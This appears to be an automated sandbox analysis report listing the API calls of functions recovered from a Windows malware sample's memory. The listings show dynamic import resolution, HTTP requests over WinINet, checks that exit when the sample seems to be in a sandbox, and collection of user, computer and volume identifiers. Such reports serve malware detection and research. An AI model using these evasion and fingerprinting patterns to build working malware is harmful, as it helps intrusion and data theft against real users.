GetProcAddress.KERNEL32(75900000,00746020), ref: 00419FCA
GetProcAddress.KERNEL32(75900000,00750418), ref: 00419FE2
GetProcAddress.KERNEL32(75900000,00750460), ref: 00419FFA
GetProcAddress.KERNEL32(75900000,00746040), ref: 0041A013
GetProcAddress.KERNEL32(75900000,00746260), ref: 0041A02B
LoadLibraryA.KERNEL32(00750688,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
LoadLibraryA.KERNEL32(007505E0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
LoadLibraryA.KERNEL32(007505F8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
LoadLibraryA.KERNEL32(00750610,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
LoadLibraryA.KERNEL32(007506A0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
LoadLibraryA.KERNEL32(00750628,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
LoadLibraryA.KERNEL32(00750640,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
LoadLibraryA.KERNEL32(00750658,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
GetProcAddress.KERNEL32(75FD0000,00746080), ref: 0041A0DA
GetProcAddress.KERNEL32(75FD0000,00750670), ref: 0041A0F2
GetProcAddress.KERNEL32(75FD0000,00750048), ref: 0041A10A
GetProcAddress.KERNEL32(75FD0000,00781108), ref: 0041A123
GetProcAddress.KERNEL32(75FD0000,007461C0), ref: 0041A13B
GetProcAddress.KERNEL32(73530000,0074A3A0), ref: 0041A160
GetProcAddress.KERNEL32(73530000,00745FE0), ref: 0041A179
GetProcAddress.KERNEL32(73530000,0074A580), ref: 0041A191
GetProcAddress.KERNEL32(73530000,007811C8), ref: 0041A1A9
GetProcAddress.KERNEL32(73530000,007810A8), ref: 0041A1C2
GetProcAddress.KERNEL32(73530000,00746060), ref: 0041A1DA
GetProcAddress.KERNEL32(73530000,007461E0), ref: 0041A1F2
GetProcAddress.KERNEL32(73530000,00781120), ref: 0041A20B
GetProcAddress.KERNEL32(763B0000,007460A0), ref: 0041A22C
GetProcAddress.KERNEL32(763B0000,00746280), ref: 0041A244
GetProcAddress.KERNEL32(763B0000,00781258), ref: 0041A25D
GetProcAddress.KERNEL32(763B0000,007811B0), ref: 0041A275
GetProcAddress.KERNEL32(763B0000,00745EA0), ref: 0041A28D
GetProcAddress.KERNEL32(750F0000,0074A5A8), ref: 0041A2B3
GetProcAddress.KERNEL32(750F0000,0074A5D0), ref: 0041A2CB
GetProcAddress.KERNEL32(750F0000,00781138), ref: 0041A2E3
GetProcAddress.KERNEL32(750F0000,00745EC0), ref: 0041A2FC
GetProcAddress.KERNEL32(750F0000,00746100), ref: 0041A314
GetProcAddress.KERNEL32(750F0000,0074A6E8), ref: 0041A32C
GetProcAddress.KERNEL32(75A50000,00781000), ref: 0041A352
GetProcAddress.KERNEL32(75A50000,00745F40), ref: 0041A36A
GetProcAddress.KERNEL32(75A50000,0074FFE8), ref: 0041A382
GetProcAddress.KERNEL32(75A50000,007810D8), ref: 0041A39B
GetProcAddress.KERNEL32(75A50000,00781288), ref: 0041A3B3
GetProcAddress.KERNEL32(75A50000,00746200), ref: 0041A3CB
GetProcAddress.KERNEL32(75A50000,007460C0), ref: 0041A3E4
GetProcAddress.KERNEL32(75A50000,00780FE8), ref: 0041A3FC
GetProcAddress.KERNEL32(75A50000,00781270), ref: 0041A414
GetProcAddress.KERNEL32(75070000,00745F20), ref: 0041A436
GetProcAddress.KERNEL32(75070000,00781030), ref: 0041A44E
GetProcAddress.KERNEL32(75070000,007812A0), ref: 0041A466
GetProcAddress.KERNEL32(75070000,007812B8), ref: 0041A47F
GetProcAddress.KERNEL32(75070000,00781150), ref: 0041A497
GetProcAddress.KERNEL32(74E50000,00745F60), ref: 0041A4B8
GetProcAddress.KERNEL32(74E50000,00746160), ref: 0041A4D1
GetProcAddress.KERNEL32(75320000,007460E0), ref: 0041A4F2
GetProcAddress.KERNEL32(75320000,00780FD0), ref: 0041A50A
GetProcAddress.KERNEL32(6F060000,00746120), ref: 0041A530
GetProcAddress.KERNEL32(6F060000,00745EE0), ref: 0041A548
GetProcAddress.KERNEL32(6F060000,00745F00), ref: 0041A560
GetProcAddress.KERNEL32(6F060000,00781168), ref: 0041A579
GetProcAddress.KERNEL32(6F060000,00746180), ref: 0041A591
GetProcAddress.KERNEL32(6F060000,007461A0), ref: 0041A5A9
GetProcAddress.KERNEL32(6F060000,00745F80), ref: 0041A5C2
GetProcAddress.KERNEL32(6F060000,00745FA0), ref: 0041A5DA
GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0041A5F1
GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0041A607
GetProcAddress.KERNEL32(74E00000,00781048), ref: 0041A629
GetProcAddress.KERNEL32(74E00000,00750008), ref: 0041A641
GetProcAddress.KERNEL32(74E00000,007810F0), ref: 0041A659
GetProcAddress.KERNEL32(74E00000,00781018), ref: 0041A672
GetProcAddress.KERNEL32(74DF0000,00745FC0), ref: 0041A693
GetProcAddress.KERNEL32(6F9C0000,00781060), ref: 0041A6B4
GetProcAddress.KERNEL32(6F9C0000,00746140), ref: 0041A6CD
GetProcAddress.KERNEL32(6F9C0000,00781180), ref: 0041A6E5
GetProcAddress.KERNEL32(6F9C0000,00781198), ref: 0041A6FD

Strings

ft, xrefs: 00419D44
@ft, xrefs: 00419D5C
`bt, xrefs: 0041A01E
^t, xrefs: 0041A53B
``t, xrefs: 0041A1CD
@`t, xrefs: 0041A005
@bt, xrefs: 00419DD6
@_t, xrefs: 0041A35D
bt, xrefs: 00419E4F
_t, xrefs: 0041A16B
InternetSetOptionA, xrefs: 0041A5E5
at, xrefs: 0041A1E5
@at, xrefs: 0041A6BF
HttpQueryInfoA, xrefs: 0041A5FC
`at, xrefs: 0041A4C3
`_t, xrefs: 0041A4AB
`t, xrefs: 00419FBC
at, xrefs: 0041A522
_t, xrefs: 0041A428
et, xrefs: 00419C38
`t, xrefs: 0041A4E5

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: _t$ `t$ at$ bt$ ft$@_t$@`t$@at$@bt$@ft$HttpQueryInfoA$InternetSetOptionA$`_t$``t$`at$`bt$^t$_t$`t$at$et
API String ID: 2238633743-4170534340
Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

Function 00406280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
StrCmpCA.SHLWAPI(?,00750148), ref: 00406303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
HttpOpenRequestA.WININET(00000000,GET,?,007821A8,00000000,00000000,00400100,00000000), ref: 00406385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
InternetCloseHandle.WININET(00000000), ref: 004064EF
InternetCloseHandle.WININET(00000000), ref: 004064F9
InternetCloseHandle.WININET(00000000), ref: 00406503

Strings

ERROR, xrefs: 00406407
ERROR, xrefs: 004064C9
GET, xrefs: 0040637C

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3074848878-2509457195
Opcode ID: 74f4209007b577ccc48e8c0826d09269495c13b7839733709352ef9982036ea0
Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
Opcode Fuzzy Hash: 74f4209007b577ccc48e8c0826d09269495c13b7839733709352ef9982036ea0
Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

Function 004117A0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 160
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 004117C5
ExitProcess.KERNEL32 ref: 004117D1
strtok_s.MSVCRT ref: 004117E8

Strings

block, xrefs: 004117B7

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: 31160efdca7bf48b69b5a6bd97d33fb6c5fabe7ffbf706427cbe04744fdb8866
Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
Opcode Fuzzy Hash: 31160efdca7bf48b69b5a6bd97d33fb6c5fabe7ffbf706427cbe04744fdb8866
Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

Function 00415510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,007478F8,?,0042110C,?,00000000), ref: 0041A82B
Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
Sleep.KERNEL32(0000EA60), ref: 00415A1B

Strings

ERROR, xrefs: 0041577D
ERROR, xrefs: 00415636
ERROR, xrefs: 00415932
ERROR, xrefs: 00415693
ERROR, xrefs: 00415849
ERROR, xrefs: 004159FE

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleepstrtok
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3630751533-2791005934
Opcode ID: 95f0fc00100f30bd4b73b87d77ac1ad8fe0b2bd46b58b2d7260737c8619ee5eb
Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
Opcode Fuzzy Hash: 95f0fc00100f30bd4b73b87d77ac1ad8fe0b2bd46b58b2d7260737c8619ee5eb
Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

Function 00417500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
HeapAlloc.KERNEL32(00000000), ref: 0041760A
wsprintfA.USER32 ref: 00417640

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Strings

:, xrefs: 0041755C
C, xrefs: 0041754C
\, xrefs: 00417560

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

Function 022A003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 022A024D

Strings

kernel32.dll, xrefs: 022A008F, 022A0095
cess, xrefs: 022A018D

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: f1b68c4e866eb6bf352efcac94c1e1f5dda4d29739ae1cf08dabacc0efa7f195
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 15527974A11229DFDB64CF98C994BACBBB1BF09304F1480D9E90DAB755DB30AA84CF14

Function 004169F0 Relevance: 10.6, APIs: 7, Instructions: 89
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00750AB0), ref: 004198A1
Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00750C90), ref: 004198BA
Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00750BA0), ref: 004198D2
Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00750B70), ref: 004198EA
Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00750C18), ref: 00419903
Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00747988), ref: 0041991B
Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,007463E0), ref: 00419933
Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,007465A0), ref: 0041994C
Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00750B58), ref: 00419964
Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00750BB8), ref: 0041997C
Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00750CF0), ref: 00419995
Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00750CA8), ref: 004199AD
Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00746540), ref: 004199C5
Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00750A20), ref: 004199DE

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211

Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E

Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143

Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294

Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774

GetUserDefaultLCID.KERNEL32 ref: 00416A26

Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6

Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F

Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,007478F8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
CloseHandle.KERNEL32(00000000), ref: 00416AF9
Sleep.KERNEL32(00001770), ref: 00416B04
CloseHandle.KERNEL32(?,00000000,?,007478F8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
ExitProcess.KERNEL32 ref: 00416B22

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 3511611419-0
Opcode ID: 757631a7605bd19b27fc3a18d5fe2d42be749bdc5fe49fa92823ddfc14995c0f
Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
Opcode Fuzzy Hash: 757631a7605bd19b27fc3a18d5fe2d42be749bdc5fe49fa92823ddfc14995c0f
Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

Function 004047B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60
stringnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849

Strings

<, xrefs: 004047C9

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: ??2@$CrackInternetlstrlen
String ID: <
API String ID: 1683549937-4251816714
Opcode ID: 6f5239c701e20752d7d8ba123c44c1d3618565534ec3c3498ef931a8274c7e29
Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
Opcode Fuzzy Hash: 6f5239c701e20752d7d8ba123c44c1d3618565534ec3c3498ef931a8274c7e29
Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

Function 00401220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
__aulldiv.LIBCMT ref: 00401258
__aulldiv.LIBCMT ref: 00401266
ExitProcess.KERNEL32 ref: 00401294

Strings

@, xrefs: 00401233

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

Function 00416AF3 Relevance: 6.0, APIs: 4, Instructions: 30
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,007478F8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
CloseHandle.KERNEL32(00000000), ref: 00416AF9
Sleep.KERNEL32(00001770), ref: 00416B04
CloseHandle.KERNEL32(?,00000000,?,007478F8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
ExitProcess.KERNEL32 ref: 00416B22

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
